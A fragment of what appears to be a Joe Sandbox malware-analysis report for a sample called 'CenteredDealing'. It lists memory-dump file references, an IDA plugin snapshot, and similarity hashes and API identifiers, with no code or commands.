                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683450250.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_CenteredDealing.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID: lstrlen$CharNextlstrcmpi
                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                        • API String ID: 190613189-0
                                                                                                                                                                                                                                                                        • Opcode ID: f82830a26d6d2443e283ff34aa02cafdf5392a3ccdb3054c8558e2fdbecc5bb1
                                                                                                                                                                                                                                                                        • Instruction ID: 82a91399e33c41d3abe84131f59dcd741317d7299bce3ff9d06b8c6e92496674
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f82830a26d6d2443e283ff34aa02cafdf5392a3ccdb3054c8558e2fdbecc5bb1
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D5F0CD31205988EFCB019FA9CD04C9FBBA8EF56350B2180AAE840E7310D630EE01DBA4